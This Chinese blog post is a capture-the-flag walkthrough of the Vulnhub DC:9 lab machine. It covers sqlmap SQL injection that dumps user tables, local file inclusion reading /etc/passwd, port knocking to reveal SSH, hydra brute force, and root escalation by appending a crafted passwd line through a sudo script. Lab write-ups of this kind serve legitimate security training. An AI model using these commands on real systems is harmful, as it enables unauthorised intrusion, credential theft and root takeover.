Vulnhub | DC: 9 |【实战】_192.168.101.39-优快云博客

本文链接：https://blog.youkuaiyun.com/bin789456/article/details/126849737

写在前面

靶场链接：
https://www.vulnhub.com/entry/dc-9,412/

DC系列，有些知识点在DC:1中提到，可以翻阅

DC:1

恭喜你，DC_9是DC系列的最后一个靶场，你已经刷完DC系列了，推荐你看最后的DC篇总结。

信息收集

这里省略了网段扫描，直接对目标进行端口扫描。

ip: 192.168.101.39
port: 80

在这里插入图片描述
进去看看，一开始就提示从上面功能栏中选择一栏，总共四栏。

对应路径分别为：

/index.php
/display.php
/search.php
/manage.php

如下四图

在这里插入图片描述

寻找突破点

前两个就是信息的展示，后两个有输入点，抓包查看这两个点。

登录点。输入是明文传输，无验证码，有爆破的机会，同时前面页面有员工信息泄露，可以制作社工字典针对型爆破。不过爆破是没有办法的时候再来尝试了，先看看另一个点
在这里插入图片描述
简单的sql测试，成功了，这里显然是突破点。

在这里插入图片描述
继续尝试一些其他语句。

探测列数
在这里插入图片描述

确定回显位
在这里插入图片描述

SQL注入

已经非常明显了，使用工具，就不手工攻击了。记得将数据包存入一个文本文件，这里就是存为hack.txt，加上-r参数即可

sqlmap -r hack.txt

在这里插入图片描述
继续查询

sqlmap -r hack.txt --current-db

在这里插入图片描述
查到目标点

sqlmap -r hack.txt -D Staff -T Users -dump

在这里插入图片描述
随便找一个破解试试

得到账号密码。

admin
transorbital1

登录成功，新开了两个栏，点进去没什么东西，下方提示

file does not exist

如果看过前面的dc系列，在dc5中也有爆破本地文件包含参数进行攻击的思路。需要一些经验和猜测吧
在这里插入图片描述

文件包含

推断可能为本地包含点，爆破参数名和包含文件。
在这里插入图片描述
找到

以file为参数，简单做目录穿越就可以攻击了
在这里插入图片描述

网页表现
在这里插入图片描述
尝试查看其他敏感文件。注意这里payload比一般的往上多了一级，因为探测的时候就需要往上一级才是当前网页（index.php）加载路径

?file=../../../../etc/passwd

在这里插入图片描述
其实到这里，你是否觉得和dc5非常相似，也是本地文件包含，那么我用一样的思路不就行了么？

日志写马，是本地文件包含的惯用手法，只是现在是apache，之前是nginx

查看日志路径（可能被修改过）

?file=../../../../etc/apache2/apache2.conf

在这里插入图片描述
从源代码看看，是在一个变量后面。

继续跟进

/etc/apache2/envvars

在这里插入图片描述
查询access.log ，error.log 无果。

在这里插入图片描述
应该是关了

隐藏SSH

似乎到这里思路就断了。这个靶机感觉怪怪的，因为以往的靶机至少都会开放80，22端口，但是这个靶机扫描结果没有22端口，工作者难以对目标网站进行维护。

这里就是隐藏SSH技术。先说说ssh安全，这里先简单介绍一些ssh防御方法

这里暂不讨论ssh本身缺陷的防御（及时更新，及时打补丁…），仅从能动性防御角度触发

定期修改ssh密码，或使用证书登录
修改ssh端口
修改ssh配置，设置登录时长，错误尝试次数

上述的方法，其实都有绕过和攻击的空间，较为安全的就是knockd工具，它可以和防火墙联合工作，只有正确“敲门”，去连接相应的端口序列，才能打开22端口

这样做，有类似一次一密的保护，同时隐藏了ssh的指纹。

knockd具体工作方式：https://blog.youkuaiyun.com/nzjdsds/article/details/112476120

首先查询当前任务调度：
在这里插入图片描述
从源码看再ctrl+f一下

查看knockd的配置文件 /etc/knockd.conf

查看源代码

得到敲门序列

7469，8475，9842

这里建议下载knockd工具，直接使用自带的knock，一键敲门

knock 192.168.101.39 7469:tcp 8475:tcp 9842:tcp

使用nmap也可以：

for x in 7469,8475,9842; do nmap -Pn --max-retries 0 -p $x 192.168.101.39; done

敲门后再次扫描，找到ssh端口
在这里插入图片描述
进入ssh，利用前面的sql点，查出所有敏感数据

sqlmap -r hack.txt -D users -T UserDetails -dump

在这里插入图片描述
将上述提到的密码和用户名制作为字典，使用hydra破解即可

得到三个用户密码，令人激动，上去看看。

这里其实设计的不是很好，三个用户基本一样，suid文件无差异，就藏了一个线索在其中一个用户中。就只能慢慢找。

suid无差异
在这里插入图片描述

查大家的文件

终于在janitor用户下，找到一个隐藏密码本

重新制为字典，再次爆破

出现两个用户，再查

有一个test文件，运行时提示有test.py

find一下 test.py

find / -name test.py -print 2>/dev/null

在这里插入图片描述
代码审计一下

就是一个追加功能，先打开第一参数，再追加第二参数

权限提升

追加内容的攻击，我们在dc4中有遇到过，同样是追加 /etc/passwd 文件
在这里插入图片描述
这次写个密码，存至tmp目录下

echo 'sayo:$1$123456$F7kNUZuCbTjf7qCbQhTB21:0:0:root:/root:/bin/bash' > /tmp/hack
sudo ./test /tmp/hack /etc/passwd

在这里插入图片描述
登录

得到flag